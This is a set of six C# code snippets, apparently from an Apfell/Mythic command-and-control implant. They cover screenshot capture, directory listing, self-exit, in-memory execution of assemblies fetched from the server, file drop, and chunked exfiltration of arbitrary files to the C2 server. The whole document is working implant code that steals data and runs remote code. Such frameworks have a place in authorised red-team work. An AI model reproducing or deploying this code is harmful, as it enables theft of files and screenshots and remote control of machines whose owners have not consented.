Пример #1
0
        // Same workflow as sending a file to Apfell server, but we only use one chunk
        private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
        {
            try // Try block for HTTP request
            {
                // Send total number of chunks to Apfell server
                // Number of chunks will always be one for screen capture task
                // Receive file ID in response
                SCTaskResp    initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}");
                DownloadReply reply   = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
                Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);

                // Convert chunk to base64 blob and create our FileChunk
                FileChunk fc = new FileChunk();
                fc.chunk_num  = 1;
                fc.file_id    = reply.file_id;
                fc.chunk_data = Convert.ToBase64String(screenshot);

                // Send our FileChunk to Apfell server
                // Receive status in response
                SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
                Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
                string postReply = implant.PostResponse(response);
                Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");

                // Tell the Apfell server file transfer is done
                implant.SendComplete(task.id);
            }
            catch (Exception e) // Catch exceptions from HTTP requests
            {
                // Something failed, so we need to tell the server about it
                task.status  = "error";
                task.message = e.Message;
            }
        }
Пример #2
0
        public static void Execute(SCTask task, SCImplant implant)
        {
            string path = task.@params;
            SharpSploitResultList <Host.FileSystemEntryResult> list;

            try
            {
                if (path != "")
                {
                    list = Host.GetDirectoryListing(path);
                }
                else
                {
                    list = Host.GetDirectoryListing();
                }

                List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >();

                foreach (Host.FileSystemEntryResult item in list)
                {
                    FileInfo f = new FileInfo(item.Name);
                    Dictionary <string, string> infoDict = new Dictionary <string, string>();
                    try
                    {
                        infoDict.Add("size", f.Length.ToString());
                        infoDict.Add("type", "file");
                        infoDict.Add("name", f.Name);
                        fileList.Add(infoDict);
                    }
                    catch
                    {
                        infoDict.Add("size", "0");
                        infoDict.Add("type", "dir");
                        infoDict.Add("name", item.Name);
                        fileList.Add(infoDict);
                    }
                }

                SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fileList));
                implant.PostResponse(response);
                implant.SendComplete(task.id);
                task.status  = "complete";
                task.message = fileList.ToString();
            }
            catch (DirectoryNotFoundException)
            {
                Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
                implant.SendError(task.id, "Error: Directory not found.");
                task.status  = "error";
                task.message = "Directory not found.";
            }
            catch (Exception e)
            {
                Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
                implant.SendError(task.id, $"Error: {e.Message}");
                task.status  = "error";
                task.message = e.Message;
            }
        }
Пример #3
0
 public static void Execute(SCTask task, SCImplant implant)
 {
     try
     {
         implant.SendComplete(task.id);
     }
     catch (Exception e)
     {
         implant.SendError(task.id, e.Message);
     }
     Environment.Exit(0);
 }
Пример #4
0
        public static void Execute(SCTask task, SCImplant implant)
        {
            JObject json    = (JObject)JsonConvert.DeserializeObject(task.@params);
            string  file_id = json.Value <string>("file_id");

            string[]            args          = json.Value <string[]>("args");
            byte[]              assemblyBytes = Upload.GetFile(file_id, implant);
            Reflection.Assembly assembly      = Reflection.Assembly.Load(assemblyBytes);
            string              result        = assembly.EntryPoint.Invoke(null, args).ToString();

            implant.PostResponse(new SCTaskResp(task.id, result));
            implant.SendComplete(task.id);
        }
Пример #5
0
        public static void Execute(SCTask task, SCImplant implant)
        {
            JObject json     = (JObject)JsonConvert.DeserializeObject(task.@params);
            string  file_id  = json.Value <string>("file_id");
            string  filepath = json.Value <string>("remote_path");

            Debug.WriteLine("[-] Upload - Tasked to get file " + file_id);

            // If file exists, don't write file
            if (File.Exists(filepath))
            {
                Debug.WriteLine($"[!] Upload - ERROR: File exists: {filepath}");
                implant.SendError(task.id, "ERROR: File exists.");
            }
            else
            {
                // First we have to request the file from the server with a POST
                string fileEndpoint = implant.endpoint + "files/callback/" + implant.callbackId;
                try // Try block for HTTP request
                {
                    string payload = "{\"file_id\": \"" + file_id + "\"}";

                    string result = HTTP.Post(fileEndpoint, payload);
                    byte[] output = Convert.FromBase64String(result);
                    try // Try block for writing file to disk
                    {
                        // Write file to disk
                        File.WriteAllBytes(filepath, output);
                        implant.SendComplete(task.id);
                        Debug.WriteLine("[+] Upload - File written: " + filepath);
                    }
                    catch (Exception e) // Catch exceptions from file write
                    {
                        // Something failed, so we need to tell the server about it
                        implant.SendError(task.id, e.Message);
                        Debug.WriteLine("[!] Upload - ERROR: " + e.Message);
                    }
                }
                catch (Exception e) // Catch exceptions from HTTP request
                {
                    // Something failed, so we need to tell the server about it
                    implant.SendError(task.id, e.Message);
                    Debug.WriteLine("[!] Upload - ERROR: " + e.Message);
                }
            }
        }
Пример #6
0
        public static void Execute(SCTask task, SCImplant implant)
        {
            string filepath = task.@params;

            try // Try block for file upload task
            {
                // Get file info to determine file size
                FileInfo fileInfo = new FileInfo(filepath);
                long     size     = fileInfo.Length;
                Debug.WriteLine($"[+] Download - DOWNLOADING: {filepath}, {size} bytes");

                // Determine number of 512kb chunks to send
                long total_chunks = size / 512000;
                // HACK: Dumb workaround because longs don't have a ceiling operation
                if (total_chunks == 0)
                {
                    total_chunks = 1;
                }
                Debug.WriteLine($"[+] Download - File size = {size} ({total_chunks} chunks)");

                // Send number of chunks associated with task to Apfell server
                // Response will have the file ID to send file with
                SCTaskResp    initial = new SCTaskResp(task.id, "{\"total_chunks\": " + total_chunks + ", \"task\": \"" + task.id + "\"}");
                DownloadReply reply   = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
                Debug.WriteLine($"[-] Download - Received reply, file ID: " + reply.file_id);


                // Send file in chunks
                for (int i = 0; i < total_chunks; i++)
                {
                    byte[] chunk = null;
                    long   pos   = i * 512000;

                    // We need to use a FileStream in case our file size in bytes is larger than an Int32
                    // With a filestream, we can specify a position as a long, and then use Read() normally
                    using (FileStream fs = new FileStream(filepath, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
                    {
                        fs.Position = pos;

                        // If this is the last chunk, size will be the remaining bytes
                        if (i == total_chunks - 1)
                        {
                            chunk = new byte[size - (i * 512000)];
                            int chunkSize = chunk.Length;
                            fs.Read(chunk, 0, chunkSize);
                        }
                        // Otherwise we'll read 512kb from the file
                        else
                        {
                            chunk = new byte[512000];
                            fs.Read(chunk, 0, 512000);
                        }
                    }

                    // Convert chunk to base64 blob and create our FileChunk
                    FileChunk fc = new FileChunk();
                    fc.chunk_num  = i;
                    fc.file_id    = reply.file_id;
                    fc.chunk_data = Convert.ToBase64String(chunk);

                    // Send our FileChunk to Apfell server
                    SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
                    Debug.WriteLine($"[+] Download - CHUNK SENT: {fc.chunk_num}");
                    Debug.WriteLine($"[-] Download - RESPONSE: {implant.PostResponse(response)}");
                    // Make sure we respect the sleep setting
                    Thread.Sleep(implant.sleep);
                }

                // Tell the Apfell server file transfer is done
                implant.SendComplete(task.id);
                Debug.WriteLine($"[+] Download - File transfer complete: {filepath}");
            }
            catch (Exception e) // Catch any exception from file upload
            {
                // Something failed, so we need to tell the server about it
                task.status  = "error";
                task.message = e.Message;
            }
        }